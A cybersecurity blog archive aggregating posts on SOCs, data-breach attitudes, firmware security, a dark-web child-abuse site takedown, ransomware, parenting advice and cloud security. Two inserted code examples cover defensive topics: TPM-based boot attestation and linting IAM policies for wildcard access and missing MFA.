Category Archives: Cybersecurity

Why organizations must arm their SOCs for the future

Security Operations Centers (SOCs) around the globe represent the first line of defense between enterprises and cyber-threats. This mission requires that SOCs respond to security alerts around the clock and jump into action as quickly as possible to minimize the damage done by events that are in progress, while keeping the uptime of critical operations in accordance with the SLAs. The importance of SOCs is highlighted by the fact that 30% of CEOs rate cyber-threats … More

The post Why organizations must arm their SOCs for the future appeared first on Help Net Security.

Perceptions on the impact of data breaches and identity protection

4iQ recently completed research focusing on Americans’ attitudes about cybersecurity breaches and the efforts that organizations make to mitigate breaches’ effects on identity theft. Where’s the data? The findings indicate that a large proportion of Americans (44%) believe their personally identifiable information (PII) has been stolen as a result of a data breach. A strong majority (63%) are concerned that prior breaches could lead to future identity fraud, and a significant number (37%) believe they … More

The post Perceptions on the impact of data breaches and identity protection appeared first on Help Net Security.

How the under 30s expect new approaches to cybersecurity

In today’s multigenerational workforce, the over-30s are more likely to adopt cybersecurity good practice than their younger colleagues who have grown up with digital technology. This is according to a report on generational attitudes to cybersecurity from the security division of NTT. The report identified good and bad practice for organizations researched as part of its Risk:Value 2019 report, scored across 17 key criteria. This revealed that under-30s score 2.3 in terms of cybersecurity best … More

The post How the under 30s expect new approaches to cybersecurity appeared first on Help Net Security.

“Gilmore Girls” Actress Alexis Bledel Is McAfee’s Most Dangerous Celebrity 2019

You probably know Alexis Bledel from her role as the innocent book worm Rory Gilmore in network television’s “Gilmore Girls” or as shy, quiet Lena Kaligaris in the “Sisterhood of the Travelling Pants” movies. But her most recent role as Ofglen in Hulu’s acclaimed “The Handmaid’s Tale” took a bit of a darker turn. And while Bledel made this dramatic on-screen transition, her rising stardom has in turn made her a prime target for malicious search results online, leading to her coming in at the top of McAfee’s 2019 Most Dangerous Celebrities list.

For the thirteenth year in a row, McAfee researched famous individuals to reveal the riskiest celebrity to search for online or whose search results could expose fans to malicious content. Bledel is joined in the top ten most dangerous celebrities by fellow actresses Sophie Turner (No. 3), Anna Kendrick (No. 4), Lupita Nyong’o (No. 5), and Tessa Thompson (No. 10). Also included in the top ten list are late night talk show hosts James Corden (No. 2) and Jimmy Fallon (No. 6). Rounding out the rest of the top ten are martial arts master Jackie Chan (No. 7) and rap artists Lil Wayne (No. 8) and Nicki Minaj (No. 9).

Many users don’t realize that simple internet searches for their favorite celebrities could potentially lead to malicious content, as cybercriminals often leverage these popular searches to entice users to click on dangerous links. This year’s study emphasizes that today’s streaming culture doesn’t exactly protect users from cybercriminals. For example, Alexis Bledel and Sophie Turner are strongly associated with searches including the term “torrent,” indicating that many fans of “The Handmaid’s Tale” and “Game of Thrones” have been pursuing free options to avoid subscription fees. However, users must understand that torrent or pirated downloads can open them up to an abundance of cyberthreats.

So, whether you’re checking out what Alexis Bledel has been up to since “Gilmore Girls” or searching for the latest production of James Corden’s “Crosswalk the Musical,” be a proactive fan and follow these security tips when browsing the internet:

  • Be careful what you click. Users looking for information on their favorite celebrities should be cautious and only click on links to reliable sources for downloads. The safest thing to do is to wait for official releases instead of visiting third-party websites that could contain malware.
  • Refrain from using illegal streaming sites. When it comes to dangerous online behavior, using illegal streaming sites could wreak havoc on your device. Many illegal streaming sites are riddled with malware or adware disguised as pirated video files. Do yourself a favor and stream the show from a reputable source.
  • Protect your online safety with a cybersecurity solution. Safeguard yourself from cybercriminals with a comprehensive security solution like McAfee Total Protection. This can help protect you from malware, phishing attacks, and other threats.
  • Use a website reputation tool. Use a website reputation tool such as McAfee WebAdvisor, which alerts users when they are about to visit a malicious site.
  • Use parental control software. Kids are fans of celebrities too, so ensure that limits are set for your child on their devices and use parental control software to help minimize exposure to potentially malicious or inappropriate websites.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow me and @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post “Gilmore Girls” Actress Alexis Bledel Is McAfee’s Most Dangerous Celebrity 2019 appeared first on McAfee Blogs.

Targeted online messaging dissuading young gamers from getting involved in cybercrime

Highly-targeted messaging campaigns from law enforcement can be surprisingly effective at dissuading young gamers from getting involved in cybercrime, a new study has suggested. Law enforcement interventions The study, by researchers from the University of Cambridge and University of Strathclyde, looked at four different types of law enforcement interventions, the first evaluation of their effectiveness for this particular type of cybercrime. They found that while high-profile arrests and sentencing of cybercriminals only lead to … More

The post Targeted online messaging dissuading young gamers from getting involved in cybercrime appeared first on Help Net Security.

In the Workplace, Safety Is Sexy. And It All Starts With Your HR Department

Maintaining workplace safety can seem like a rare form of torture–videos and quizzes and talks and such. For most of us, it’s a necessary chore. But despite the looks among employees with each new H.R. training session, the work that happens in those conference rooms at least in theory translates to profits.

The inoculation process of onboarding a new hire is profoundly important to the proper functioning of any organization. Never before have there been more actionable sensitivities and special needs, all of them calling for empathy and action in the workplace. Safety is important. People don’t work well when they don’t feel secure.

Creating an environment where employees feel safe takes many forms: It can be as simple as the correct placement of fire extinguishers, smoke detectors and alarms and/or providing employees with tips for monitor placement, or it can involve shock-absorbent flooring. Of course, it also involves the establishment and policing of an organization’s social and cultural norms. Google has taken this to the next level with its steps to ensure psychological safety to prevent employees in teams from feeling insecure or embarrassed. (If the company’s utter dominance in nearly every Internet-related field is any indicator, the strategy seems to be working out for them.)

Notwithstanding the Google example, it would be a stretch–and possibly an actionable H.R. error–to describe as “sexy” the various manifestations of workplace best-practices.

H.R. departments are in the business of minimizing the use of trigger words. When someone in the room says that this or that profitable situation is “sexy” there are other words that can carry the same amount of water–for instance, “exciting” or “awesome.” Basically, that word, for some demographic types, means “super cool,” and can be applied to the purchase of a new car, a new smartphone or bagging a multi-million dollar contract. No champagne, no smoke machine.

Enter Tall, Dark and Cyber Safe

Where cybersecurity is concerned, many employees have a sort of click-and-pray approach. It is not a method that inspires a great feeling of security. Add to that the reality of doing business today. Businesses and employees alike live under constant threat of the fallout from someone–maybe even the child of an employee who brings their own devices to work–clicking on the wrong link, opening the wrong attachment or mistakenly creating an unsecured database containing sensitive information.

The cause of the next corporation-killing megabreach could be on any machine in the workplace just waiting for an uninformed or distracted employee to activate it. The answer is in the H.R. department: cyber is a cultural issue. One of the norms of any properly functioning organization must be the propagation of a culture of cybersecurity. A growing trend in employment benefits is employee-paid or voluntary cyber awareness programs coupled with identity theft resolution and identity monitoring services.

The numbers are grim. Eighty percent of businesses expect to experience a data breach before the end of 2019, and more than half of small and mid-size businesses were breached last year (and that’s just the organizations that are aware something happened). Meanwhile, the cost of a breach keeps climbing steadily, especially when lost customers, fines, and lawsuits are added to the total.

It’s an all too common scenario: undersized and demoralized IT departments sprint from one crisis to another, while H.R. departments fail to grok that cyber vulnerabilities are an existential threat on par with a gas leak in the office breakroom. The overlap between workplace safety and cyber safety is significant–in fact they belong under the same rubric: Safety. At issue too often is the failure of an organization to identify cyber vulnerabilities and then deploy H.R. to train them into submission, thus minimizing the exposure.

The 3 Ms for Business

Minimize Your Risk of Exposure: Put resources into training your staff to recognize phishing scams and to practice good cyber hygiene. Vet contractors and vendors based on their security practices to minimize supply chain risk. Consider requiring employees to log in to a VPN (virtual private network), especially if they’re connecting to the company network remotely. It’s often the sloppiest of mistakes that give hackers access to your business. Training and sound cybersecurity policies can fill in the gaps where technology often fails.

Monitor Everything: Establish a policy at your business about transferring funds; in the era of deepfakes, it’s important to know who is likely to request access to money, and how it should be handled. Always double check by getting confirmation on the phone. All systems can introduce vulnerabilities, especially the introduction of new technology. Create a culture where employees know that if they see something, they will be rewarded for saying something. Cybersecurity is a team sport.

Manage the Damage: When it comes to a compromise of your company’s identity, honesty is the best policy. Own up to a data breach as quickly as possible (especially if you are subject to the GDPR’s 72-hour requirement), be transparent about lapses in security, and review any policies that allowed the compromise to occur in the first place. Jack Dorsey’s Twitter hack may have been embarrassing, but the company moved quickly to close the security loophole that allowed it to happen. Perhaps most important, have some empathy. Cyber-fails are scary. Remember, your news might be more traumatic for your customers or clients than it is for you, and act accordingly.

If safety isn’t the most exciting thing on earth, profitability is, and any company that doesn’t devote significant resources to keeping employees current on the cyber-front will at some point have to ditch productivity (and with that, profits) while their most valuable resource–the humans working for them–recover. Bear in mind that recovery can take a very un-sexy 100-200 hours.

The post In the Workplace, Safety Is Sexy. And It All Starts With Your HR Department appeared first on Adam Levin.

Microsoft and partners design new device security requirements to protect against targeted firmware attacks

Recent developments in security research and real-world attacks demonstrate that as more protections are proactively built into the OS and in connected services, attackers are looking for other avenues of exploitation with firmware emerging as a top target. In the last three years alone, NIST’s National Vulnerability Database has shown nearly a five-fold increase in the number of firmware vulnerabilities discovered.

To combat threats specifically targeted at the firmware and operating system levels, we’re announcing a new initiative we’ve been working on with partners to design what we call Secured-core PCs. These devices, created in partnership with our PC manufacturing and silicon partners, meet a specific set of device requirements that apply the security best practices of isolation and minimal trust to the firmware layer, or the device core, that underpins the Windows operating system. These devices are designed specifically for industries like financial services, government and healthcare, and for workers that handle highly-sensitive IP, customer or personal data, including PII as these are higher value targets for nation-state attackers.


In late 2018, security researchers discovered that the hacking group Strontium had been using firmware vulnerabilities to target systems in the wild with malware delivered through a firmware attack. As a result, the malicious code was hard to detect and difficult to remove – it could persist even across common cleanup procedures like an OS re-install or a hard drive replacement.

Why attackers and researchers are devoting more effort toward firmware

Firmware is used to initialize the hardware and other software on the device and has a higher level of access and privilege than the hypervisor and operating system kernel, thereby making it an attractive target for attackers. Attacks targeting firmware can undermine mechanisms like secure boot and other security functionality implemented by the hypervisor or operating system, making it more difficult to identify when a system or user has been compromised. Compounding the problem is the fact that endpoint protection and detection solutions have limited visibility at the firmware layer, given that firmware runs underneath the operating system, making evasion easier for attackers going after firmware.

What makes a Secured-core PC?

Secured-core PCs combine identity, virtualization, operating system, hardware and firmware protection to add another layer of security underneath the operating system. Unlike software-only security solutions, Secured-core PCs are designed to prevent these kinds of attacks rather than simply detecting them. Our investments in Windows Defender System Guard and Secured-core PC devices are designed to provide the rich ecosystem of Windows 10 devices with uniform assurances around the integrity of the launched operating system and verifiable measurements of the operating system launch to help mitigate against threats taking aim at the firmware layer. These requirements enable customers to boot securely, protect the device from firmware vulnerabilities, shield the operating system from attacks, prevent unauthorized access to devices and data, and ensure that identity and domain credentials are protected.

The built-in measurements can be used by SecOps and IT admins to remotely monitor the health of their systems using System Guard runtime attestation and implement a zero-trust network rooted in hardware. This advanced firmware security works in concert with other Windows features to ensure that Secured-core PCs provide comprehensive protections against modern threats.


Removing trust from the firmware

Starting with Windows 8, we introduced Secure Boot, which relies on Unified Extensible Firmware Interface (UEFI) firmware to allow only properly signed bootloaders like the Windows boot manager to execute, to mitigate the risk posed by malicious bootloaders and rootkits. This was a significant step forward to protect against these specific types of attacks. However, since firmware is already trusted to verify the bootloaders, Secure Boot on its own does not protect from threats that exploit vulnerabilities in the trusted firmware. That’s why we worked with our partners to ensure these new Secured-core capabilities are shipped in devices right out of the box.

Using new hardware capabilities from AMD, Intel, and Qualcomm, Windows 10 now implements System Guard Secure Launch as a key Secured-core PC device requirement to protect the boot process from firmware attacks. System Guard uses the Dynamic Root of Trust for Measurement (DRTM) capabilities that are built into the latest silicon from AMD, Intel, and Qualcomm to enable the system to leverage firmware to start the hardware and then shortly after re-initialize the system into a trusted state by using the OS boot loader and processor capabilities to send the system down a well-known and verifiable code path. This mechanism helps limit the trust assigned to firmware and provides powerful mitigation against cutting-edge, targeted threats against firmware. This capability also helps to protect the integrity of the virtualization-based security (VBS) functionality implemented by the hypervisor from firmware compromise. VBS then relies on the hypervisor to isolate sensitive functionality from the rest of the OS which helps to protect the VBS functionality from malware that may have infected the normal OS even with elevated privileges. Protecting VBS is critical since it is used as a building block for important OS security capabilities like Windows Defender Credential Guard which protects against malware maliciously using OS credentials and Hypervisor-protected Code Integrity (HVCI) which ensures that a strict code integrity policy is enforced and that all kernel code is signed and verified.


Being able to measure that the device booted securely is another critical piece of this additional layer of protection from firmware compromise, and it gives admins added confidence that their endpoints are safe. That’s why we implemented Trusted Platform Module 2.0 (TPM) as one of the device requirements for Secured-core PCs. By using the TPM to measure the components that are used during the secure launch process, we help customers enable zero trust networks using System Guard runtime attestation. Conditional access policies can be implemented based on the reports provided by the System Guard attestation client running in the isolated VBS environment.
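To make the measurement-and-attestation flow described above concrete, here is an added illustration (not Microsoft's code, and not the real System Guard event format): a verifier-side model in which a TPM-style PCR is extended with each component measured during launch, the attestation client's log is replayed to check it, and a conditional-access policy allows or denies based on the result. The component names and bytes are constructed stand-ins.

```python
import hashlib

# A TPM PCR starts at zero and can only be extended, never written:
#     PCR_new = SHA-256(PCR_old || SHA-256(component))
# so the final value commits to every measured component, in order, with no way to undo one.
PCR_INIT = bytes(32)

def sha256(data: bytes) -> bytes:
    return hashlib.sha256(data).digest()

def extend(pcr: bytes, component: bytes) -> bytes:
    """One PCR extend operation for a measured component."""
    return sha256(pcr + sha256(component))

def replay_log(event_log: list) -> bytes:
    """Recompute the PCR that a log of (name, component_bytes) events should produce."""
    pcr = PCR_INIT
    for _name, component in event_log:
        pcr = extend(pcr, component)
    return pcr

# Constructed stand-ins for what Secure Launch measures after DRTM re-initializes the
# system (hypothetical names; a real event log carries hashes of the actual images).
GOLDEN_LOG = [
    ("drtm-launch-environment", b"constructed launch environment v1"),
    ("hypervisor", b"constructed hypervisor image v1"),
    ("secure-kernel", b"constructed secure kernel v1"),
    ("hvci-policy", b"constructed strict code-integrity policy"),
]
GOLDEN_PCR = replay_log(GOLDEN_LOG)

def attest(reported_pcr: bytes, event_log: list, boot_signatures_ok: bool) -> dict:
    """Decide device health the way a remote attestation verifier would.
    boot_signatures_ok models Secure Boot's signature check on its own, which
    compromised firmware can still report as passing; comparing the measured PCR
    against the expected value is what catches a changed launch path."""
    replayed = replay_log(event_log)
    return {
        "signatures_ok": boot_signatures_ok,
        "log_consistent": replayed == reported_pcr,    # log was not edited after the fact
        "matches_golden": reported_pcr == GOLDEN_PCR,  # device booted the expected code path
    }

def conditional_access(report: dict) -> str:
    """Zero-trust policy: grant access only when every attestation claim holds."""
    return "allow" if all(report.values()) else "deny"

def scenario_clean() -> str:
    return conditional_access(attest(GOLDEN_PCR, GOLDEN_LOG, True))

def scenario_tampered_hypervisor() -> str:
    # A firmware-level change swaps the hypervisor image; the signature check alone still "passes".
    log = list(GOLDEN_LOG)
    log[1] = ("hypervisor", b"constructed hypervisor image v1 (modified)")
    return conditional_access(attest(replay_log(log), log, True))

def scenario_forged_report() -> str:
    # The device claims the golden PCR, but its log cannot replay to that value
    # (in real hardware the TPM signs the PCR quote, so this mismatch is detectable).
    log = list(GOLDEN_LOG)
    log[1] = ("hypervisor", b"constructed hypervisor image v1 (modified)")
    return conditional_access(attest(GOLDEN_PCR, log, True))

if __name__ == "__main__":
    for name, fn in [("clean", scenario_clean),
                     ("tampered hypervisor", scenario_tampered_hypervisor),
                     ("forged report", scenario_forged_report)]:
        print(f"{name}: {fn()}")
```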

In addition to the Secure Launch functionality, Windows implements additional safeguards that operate while the OS is running to monitor and restrict potentially dangerous firmware functionality accessible through System Management Mode (SMM).

Beyond the hardware protection of firmware featured in Secured-core PCs, Microsoft recommends a defense-in-depth approach including security review of code, automatic updates, and attack surface reduction. Microsoft has provided an open-source firmware project called Project-Mu that PC manufacturers can use as a starting point for secure firmware.

How to get a Secured-core PC

Our ecosystem partnerships have enabled us to add this additional layer of security, right out of the box, in devices that are designed for highly-targeted industries and end-users who handle mission-critical data in some of the most data-sensitive industries like government, financial services, and healthcare. These innovations build on the value of Windows 10 Pro, which comes with built-in protections like firewall, secure boot, and file-level information-loss protection that are standard on every device.

More information on devices that are verified Secured-core PC including those from Dell, Dynabook, HP, Lenovo, Panasonic and Surface can be found on our web page.


David Weston (@dwizzzleMSFT)
Partner Director, OS Security

The post Microsoft and partners design new device security requirements to protect against targeted firmware attacks appeared first on Microsoft Security.

South Korean Administration Arrested Feds Shut Down The largest Dark Web Child Abuse Site

Today the Department of Justice of the United States said that it had arrested hundreds of criminals in a global operation after taking down the largest known child pornography site on the dark web and tracking its bitcoin payments.

With an international coalition of law enforcement agencies, federal officials arrested Jong Woo Son of South Korea, the 23-year-old operator of the child sexual abuse site, and 337 suspects who allegedly used the site knowingly.

The site, “Welcome to Video,” operated between June 2015 and March 2018 and hosted over 250,000 videos of the sexual exploitation of children, comprising more than 8 TB of data.

The Welcome to Video website hosted more than 250,000 unique videos according to a press release from the DoJ, and almost 45 percent of the videos contained images that had not previously been seen by investigators.

The operation also saved at least 23 children residing in the USA, Spain and the United Kingdom who were actively abused by Welcome to Video users on the encrypted Tor network.

Website Hosted on a Computer in the Admin’s Bedroom

Simply by analyzing the website’s HTML source code, investigators exposed the IP addresses of the server on which the site was hosted.

The IP addresses were then traced back to a server in Jong Woo Son’s house in South Korea, located in his bedroom.

Analysis of the confiscated server showed that the website had at least one million users and more than one million unique bitcoin addresses used to receive payments from visitors.

In February 2018, the United States issued a warrant for Son’s arrest. South Korean authorities then detained him on 5 March 2018 and seized the Welcome to Video server.

While Son is now serving an 18-month sentence in South Korea, just yesterday a federal grand jury in Washington DC unsealed a 9-count indictment against him, with the U.S. authorities seeking his extradition to stand trial.

“Websites benefiting from child sexual exploitation are amongst the most vile, reprehensible types of crime,” said Deputy Prosecutor General Brian A. Benczkowski of the Criminal Division of the Department of Justice.

Today’s announcement shows that the Department of Justice is strongly committed to working closely with our allies in South Korea and around the world to rescue the victims of child abuse and bring the perpetrators of these abominable crimes to justice.

Over 337 Users of the Website Have Also Been Charged and Prosecuted

Users of the website, from the U.S., UK, South Korea, Canada, Saudi Arabia, UAE, Ireland, Germany, Czech Republic, Spain, Brazil and Australia, could download videos, refer new users, or pay for videos in the “supposedly anonymous” Bitcoin cryptocurrency.

According to the indictment, at least two former federal law enforcement officers allegedly participated in the child porn site: Paul Casey Whipple, a 35-year-old United States Border Patrol agent, and former HSI agent Richard Nikolai Gratkowski.

Furthermore, two users of the Welcome to Video dark web site committed suicide after search warrants were executed.

“Welcome to Video provided these videos for sale using bitcoin cryptocurrency. Usually, this kind of website gives users a forum to exchange these images. This Darknet website is one of the first of its kind to monetize children’s videos with bitcoin,” said the press release.

The platform received at least 420 BTC during its 3 years of operation, worth $370,000 at the time the site was taken down, through at least 7300 transactions.


How cybersecurity accelerates business growth

It’s no secret that the cybersecurity industry has grown exponentially over more than a decade due to the proliferation of high-profile cybercrime. Viewing cybersecurity as simply a necessary step to mitigate cyber risk leaves much opportunity on the table. Organizational leaders need to see cybersecurity as a business enabler that can accelerate growth. Companies that view cybersecurity with the myopic lens of being a necessary overhead cost to protect data are losing out on opportunities … More

The post How cybersecurity accelerates business growth appeared first on Help Net Security.

Deepfakes and voice as the next data breach

Deepfake technology, which uses deep learning to create fake or altered video and audio content, continues to pose a major threat to businesses, consumers, and society as a whole. In the lead up to the 2020 U.S. presidential election, government officials have expressed concerns about potential deepfake attacks to spread misinformation, and evidence suggests that while this technology is advancing rapidly, governments and tech companies are still ill-prepared to detect and combat it. Deepfakes caught … More

The post Deepfakes and voice as the next data breach appeared first on Help Net Security.

Spending on security hardware, software, and services continues to increase

Worldwide spending on security products and services will enjoy solid growth over the next five years as organizations continue to invest in solutions to meet a wide range of security threats and requirements. According to an updated forecast from the IDC, worldwide spending on security-related hardware, software, and services will be $106.6 billion in 2019, an increase of 10.7% over 2018. This amount will reach $151.2 billion in 2023 with a compound annual growth rate … More

The post Spending on security hardware, software, and services continues to increase appeared first on Help Net Security.

Want Your Kids to Care More About Online Safety? Try These 7 Tips

The topics parents need to discuss with kids today can be tough compared to even a few years ago. The digital scams are getting more sophisticated and the social culture poses new, more inherent risks. Weekly, we have to broach very adult conversations with our kids. Significant conversations about sexting, bullying, online scams, identity fraud, hate speech, exclusion, and sextortion — all have to be covered, but we have to do it in ways that matter to kids.

With 95% of teens now having access to a smartphone and 45% online “almost constantly,” it’s clear we can’t monitor conversations, communities, and secret apps around the clock. So the task for parents is to move from a mindset of “protect” to one of “prepare” if we hope to get kids to take charge of their privacy and safety online.

Here are a few ideas on how to get these conversations to stick.

  1. Bring the headlines home. A quick search of your local or regional headlines should render some examples of kids who have risked and lost a lot more than they imagined online. Bringing the headlines closer to home — issues like reputation management, sex trafficking, kidnapping, sextortion, and bullying — can help your child personalize digital issues. Discussing these issues with honesty and openness can bring the reality home that these issues are real and not just things that happen to other people.
  2. Netflix and discuss. Hollywood has come a long way in the last decade in making films for tweens and teens that spotlight important digital issues. Watching movies together is an excellent opportunity to deepen understanding and spark conversation about critical issues such as cyberbullying, teen suicide, sextortion, catfishing, stalking, and examples of personal courage and empathy for others. Just a few of the movies include Cyberbully, 13 Reasons Why (watch with a parent), Eighth Grade, Searching, Bully, Disconnect. Character building movies: Dumplin’, Tall Girl, Wonder, Girl Rising, The Hate U Give, Mean Girls, and the Fat Boy Chronicles, among many others.
  3. Remove phones. Sometimes absence makes the heart grow appreciative, right? Owning a phone (or any device) isn’t a right. Phone ownership and internet access are a privilege and a responsibility. So removing a child’s phone for a few days can be especially effective if your child isn’t listening or exercising wise habits online. One study drives this phone-dependency home. Last year researchers polled millennials who said they’d rather give up a finger than their smartphones. So, this tactic may prove to be quite effective.
  4. Define community. Getting kids to be self-motivated about digital safety and privacy may require a more in-depth discussion on what “community” means. The word is used often to describe social networks, but do we really know and trust people in our online “communities?” No. Ask your child what qualities he or she values in a friend and who they might include in a trusted community. By defining this, kids may become more aware of who they are letting in and what risks grow when our digital circles grow beyond trusted friends.
  5. Assume they are swiping right. Dating has changed dramatically for tweens and teens. Sure there are apps like MeetMe and Tinder that kids explore, but even more popular ways to meet a significant other are everyday social networks like Snapchat, WhatsApp, and Instagram, where kids can easily meet “friends of friends” and start “talking.” Study the pros and cons of these apps. Talk to your kids about them and stress the firm rule of never meeting with strangers.
  6. Stay curious. Stay interested. If you, as a parent, show little interest in online risks, then why should your child? By staying curious and current about social media, apps, video games, your kids will see that you care about — and can discuss — the digital pressures that surround them every day. Subscribe to useful family safety and parenting blogs and consider setting up Google Alerts around safety topics such as new apps, teens online, and online scams.
  7. Ask awesome questions. We know that lectures and micromanaging don’t work in the long run, so making the most of family conversations is critical. One way to do this is to ask open-ended questions such as “What did you learn from this?” “What do you like or dislike about this app?” “Have you ever felt unsafe online?” and “How do you handle uncomfortable or creepy encounters online?” You might be surprised at where the conversations can go and the insight you will gain.

Make adjustments to your digital parenting approach as needed. Some things will work, and others may fall flat. The important thing is to keep conversation a priority and find a rhythm that works for your family. And don’t stress: No one has all the answers, no one is a perfect parent. We are all learning a little more each day and doing the best we can to keep our families safe online.

Be Part of Something Big

October is National Cybersecurity Awareness Month (NCSAM). Become part of the effort to make sure that our online lives are as safe and secure as possible. Use the hashtags #CyberAware, #BeCyberSafe, and #NCSAM to track the conversation in real-time.

The post Want Your Kids to Care More About Online Safety? Try These 7 Tips appeared first on McAfee Blogs.

Pitney-Bowes the Target of Ransomware

U.S. mailing services company Pitney-Bowes experienced services outages after a ransomware attack earlier this week.

“It has been confirmed that our systems have been affected by a malware attack that encrypted information on some systems and disrupted client access to our services. Our technical and operational teams are making progress to restore the affected systems. At this time, the company has seen no evidence that customer or employee data has been improperly accessed,” the company announced in a statement.

Pitney-Bowes reported that the attack had deployed Ryuk, a ransomware strain used in recent attacks on several U.S. cities and companies, including Arizona Beverages and Tribune Publishing.

In response to the incident, business credit rating agency Moody’s issued a “credit negative” event note for Pitney-Bowes, which means the company will be under increased scrutiny from credit agencies and that further cybersecurity incidents could lead to negative, long-term financial repercussions.

The attack on Pitney-Bowes comes on the heels of a warning issued by the FBI to businesses about the increased threat posed by “high impact” ransomware campaigns.

The post Pitney-Bowes the Target of Ransomware appeared first on Adam Levin.

What to consider before investing in Cloud Security Competency?

Estimated reading time: 2 minutes

American market research giant Forrester estimated in 2017 that the value of the public cloud market would reach at least $191 billion by 2020. This surge in the valuation is driven by the growing acceptance of cloud computing by enterprises in this decade.

Organizations are increasingly embracing doing business on the cloud for the various advantages it offers. They are attracted by the fact that cloud computing offers a way to reduce costs in their information technology department by eliminating physical infrastructure and leveraging the cloud solution provider’s resources.

Cloud computing offers many benefits

By hosting the business on the cloud, enterprises can be leaner and more flexible, with employees able to access essential data, information and applications from wherever they travel. In short, the next decade will see many more enterprises move to the cloud as we enter the era of the gig economy.

However, legitimate concerns about the security of cloud computing remain, and they inhibit many enterprises from taking this course. By moving to the cloud, enterprises gain flexibility but also open themselves up to a whole new set of cybersecurity challenges, including:

The possibility of a data breach

When enterprise data is stored in the cloud, there are fears about the possible repercussions of a data breach. Because the data sits on infrastructure run by a third-party provider, questions are always asked about the downtime involved and the backup methods used.

The question of compliance

Enterprises from different sectors have to grapple with various regulations on the storage of data. This is a problem that gets compounded when it comes to storing such data on the cloud.

Hacked interfaces and APIs

Almost all cloud services now provide APIs (Application Programming Interfaces), which organizations need in order to manage and interact with the cloud service they are using. The security of the cloud service therefore depends largely on the security of these APIs, and they are often the most exposed part of the system, because they are reachable directly over the Internet.

It’s these security considerations that are major factors for an enterprise looking for competency before investing in the cloud. Before shortlisting a cloud security provider, enterprises should consider the following pointers:

Multi-factor authentication

Enterprises must check whether their cloud security provider offers multi-factor authentication. As mentioned earlier, data breaches pose a significant threat to cloud computing, and turning on multi-factor authentication is a credible defence against the stolen or guessed credentials that many of them start with.

Access control

Working in a cloud environment does not take away the threat of insider breaches. To protect an enterprise from insider threats, cloud security must also provide access control, limiting each user’s access to what their role actually requires.
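The two pointers above, multi-factor authentication and least-privilege access control, are usually enforced through the provider’s identity policies, so a practitioner wants a way to check those policies before trusting them. The following Python linter is an added example, not code from the original post or from Seqrite. It assumes the AWS IAM JSON policy layout (Statement / Effect / Action / Resource / Condition) and the aws:MultiFactorAuthPresent condition key; the two policy documents in it are constructed for the example, and the list of “sensitive” action prefixes is an assumption you would tune for your own environment.

```python
"""Lint IAM-style policy documents for over-broad access and missing MFA.

Added example; it is not code from the original post or from Seqrite. It
assumes the AWS IAM JSON policy layout and the aws:MultiFactorAuthPresent
condition key. The two policies below are constructed for the example.
"""
import json

MFA_KEY = "aws:MultiFactorAuthPresent"
# Assumption: action prefixes that change data or permissions; we insist on MFA for these.
SENSITIVE_PREFIXES = ("iam:", "s3:Put", "s3:Delete", "ec2:Terminate", "kms:")


def _as_list(value):
    """Action and Resource may be a string or a list; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _mfa_state(statement):
    """'required' for Bool=true, 'if_exists' for BoolIfExists=true, else 'none'."""
    cond = statement.get("Condition", {})
    if str(cond.get("Bool", {}).get(MFA_KEY, "")).lower() == "true":
        return "required"
    if str(cond.get("BoolIfExists", {}).get(MFA_KEY, "")).lower() == "true":
        return "if_exists"
    return "none"


def lint_policy(policy_json):
    """Return (statement_index, code, detail) findings for each Allow statement."""
    doc = json.loads(policy_json)
    findings = []
    for idx, st in enumerate(_as_list(doc.get("Statement"))):
        if st.get("Effect") != "Allow":
            continue
        actions = _as_list(st.get("Action"))
        resources = _as_list(st.get("Resource"))
        if "*" in actions:
            findings.append((idx, "WILDCARD_ACTION", "Action '*' grants every API call"))
        else:
            for action in actions:
                if action.endswith(":*"):
                    findings.append((idx, "SERVICE_WIDE_ACTION", f"{action} grants an entire service"))
        if "*" in resources:
            findings.append((idx, "WILDCARD_RESOURCE", "Resource '*' applies to every resource"))
        sensitive = [a for a in actions if a == "*" or a.startswith(SENSITIVE_PREFIXES)]
        if sensitive:
            state = _mfa_state(st)
            if state == "none":
                findings.append((idx, "NO_MFA_CONDITION", f"{sensitive} allowed without MFA"))
            elif state == "if_exists":
                # BoolIfExists passes when the key is absent, which is the case for
                # requests signed with long-term access keys, so it does not force MFA.
                findings.append((idx, "WEAK_MFA_CONDITION", "BoolIfExists does not require MFA"))
    return findings


# Constructed sample: the kind of "admin for everyone" policy that gets copied around.
WEAK_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*"}],
})

# Constructed sample: read access is scoped to one bucket, writes additionally need MFA.
HARDENED_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow",
         "Action": ["s3:GetObject", "s3:ListBucket"],
         "Resource": ["arn:aws:s3:::example-reports", "arn:aws:s3:::example-reports/*"]},
        {"Effect": "Allow",
         "Action": ["s3:PutObject", "s3:DeleteObject"],
         "Resource": "arn:aws:s3:::example-reports/*",
         "Condition": {"Bool": {MFA_KEY: "true"}}},
    ],
})

if __name__ == "__main__":
    for name, doc in (("weak", WEAK_POLICY), ("hardened", HARDENED_POLICY)):
        print(name, lint_policy(doc) or "no findings")
```

Run it against exported policy documents rather than the constructed samples; anything that comes back with WILDCARD_ACTION, WILDCARD_RESOURCE or NO_MFA_CONDITION is a policy the provider’s “access control functionality” is not actually constraining.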

Data storage

Before investing in cloud security, enterprises must be aware of how their data is being stored in the cloud. Whether the cause is a malicious attack or a natural disaster, cloud data should ideally be distributed across multiple locations. This serves business continuity as well as data recovery in the event of an incident.

Offers both security and compliance

An investment in cloud security should enable the enterprise to enjoy both top-of-the-line security and also comply with territorial and global regulations.

The era of cloud computing promises to unlock productivity and efficiency for enterprises, provided they ensure the investment has been made in the correct security competencies. Seqrite Cloud provides an integrated solution that allows the management and regulation of multiple Endpoint Security and UTM products deployed at different geographical locations.

The post What to consider before investing in Cloud Security Competency? appeared first on Seqrite Blog.

Six steps for implementing zero trust access

Modern organizations are no longer governed by fixed perimeters. In fact, the perimeter-based security model is disintegrating in a world where users work on their own devices from anywhere, and sensitive company data is stored in multiple cloud services. Organizations can no longer rely on binary security models that focus on letting good guys in and keeping bad guys out. Their big challenge is figuring out how to give users the access they need while … More

The post Six steps for implementing zero trust access appeared first on Help Net Security.

Security still top priority as more enterprises scale IoT solutions company-wide

